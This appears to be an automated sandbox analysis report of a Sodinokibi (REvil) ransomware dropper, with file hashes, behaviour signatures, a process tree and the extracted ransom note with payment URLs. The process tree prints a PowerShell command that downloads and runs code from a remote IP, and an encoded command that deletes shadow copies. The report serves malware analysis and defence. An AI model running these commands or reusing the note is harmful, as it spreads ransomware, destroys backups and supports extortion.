Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    28-03-2020 18:10

General

  • Target

    geXd8EaG.bat

  • Size

    196B

  • MD5

    69cce2af07c45a25f091e8f423a8e230

  • SHA1

    2ab0572b53be5b8b30ea3878dcf9e9993617a70e

  • SHA256

    0653d143ea2f1032fa55b66c84a2f4bb315e24c5433ad3f7c29454cfe260c700

  • SHA512

    6502a55457c73b865a8535599bdb9332b7220a8437d478a02efb33fb043afa2f531f0e4d45e8fbc21b06d31b6874357f087902636aa91d6fba11b7053e3958ad

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/geXd8EaG

Extracted

Path

C:\y14b9666kf-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension y14b9666kf. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6D9B32461FE97EE8 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/6D9B32461FE97EE8 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: N4/lmWPXhrT1y8czMzfSDhl9siLIhljXH7EVFA0PNCs3anzepYH84a679hQf1Ymu m+hw10sXjqPOFxykUwH2F2Z9I8QBgBduOiwofKvkj0bqr5VbLo0uJni8DYGayi0E N71CijZ3Dp0nNA7td5KuEA4iwkJ5VK/VqnMH+jm+J/Dt0J3OnVA7yWSx0t9VnL+X RlQleajjlkji8dobFRhYeIOouyDyKN9/91SxdGTxInTp8xD/VIRI6QCZKXgfhZUa 32xgjHnY9jJzXSrNjBRy0ohXsW8MA8/8+PeYHkSFsvtofO6xq6rqjw4Wn3YVaqzE unuy7rdnwo92ucWLwVDwvxlcz6z5l3wII7j5DDBcp/w95R0ggq1+KAZ4kxW3mzYT 0uHU4yux8wKp8uXsbfEgc3gRKnJ3xivISv0BylgRGB8oynBBnXJu3Me+CVSbkoiA kHDqFLfbkE48PJrzYQSJ8XP+7RYwfUUxteNb/ckz0P99p3LLvQS1Kf81Q4+LIAWc soW7PgDZlnwWIAuXe5UYb+Py9FO6W9vrj8e6HyRPbq6OXSipmmGr8DUFYvcEqnax ro+Xft8+ydsuA9fWolbSXc6ENStaNWwRjDvWgrafD8IH1vZtH2WDmeETX9RHMhqk DvLa8qQGdUYnt8fCJvShb2a8x1L4Cjk0EIbbm3tAYhx4TwUr/NN7xtSsOWfkoAgn JaOZCcVOKQVyS9azvJAci0YczdiDDWmuEN/60WXX1U0ybDTnkrPPovbx1JFyBD78 DPTCkvCW+p5OMlo6FzvqBS3WV3PlZ6+im5aMiXxjDRrpFjCZ2gXl7toe6x3OGERH 2ZHpC/mgnvQ6WNi3LZwHSfQmkpy9aGK4/pWpAsY5cTXTawrrYSylsHsgrp2iI0wk yOH+43ymQVKdIbmvZnw8mj0PVZI95ocYT4lPBl+ex0v3FaNa/EYYh4a/o+7mbbnz HbH/aYH4vb1Ysv59pgtFC9OSk5aRH/EvLfbx1uKidQOhELXFVjnWeYr5ubVQUmBE J3rzyFw4cd8y+EHdrGVjyj5Jgsf0wbPf3basHLD//KMA/ezNR888rtNLugGwDm4o hyYixGep0LFldo5KwG/SqxyD4EBlhd8FUpV2DY+Ln977onCiDGUcGsGC4ScwHaR3 fUKiyuazP+O1oreMTrXHKlCLXdcNHTXfpapJmeAFSr56JKsw/FR22LxxtRM4tYpA GgOHwiyFWAip+sW63cQa4vKhBj/5FdvEKZvO+7B18IabW0IsGaCcBKQ3UyZO8FLJ cOjStZ7AoE3ZGKwaoaZhMrMM/gaRLtXAEYpRk4HrPriF2+jDCS7FlA== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6D9B32461FE97EE8

http://decryptor.cc/6D9B32461FE97EE8

Signatures

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 209 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\geXd8EaG.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1852
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/geXd8EaG');Invoke-YCUIYZKUVAIBP;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Modifies system certificate store
      • Discovering connected drives
      PID:1876
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:1980
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1420

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms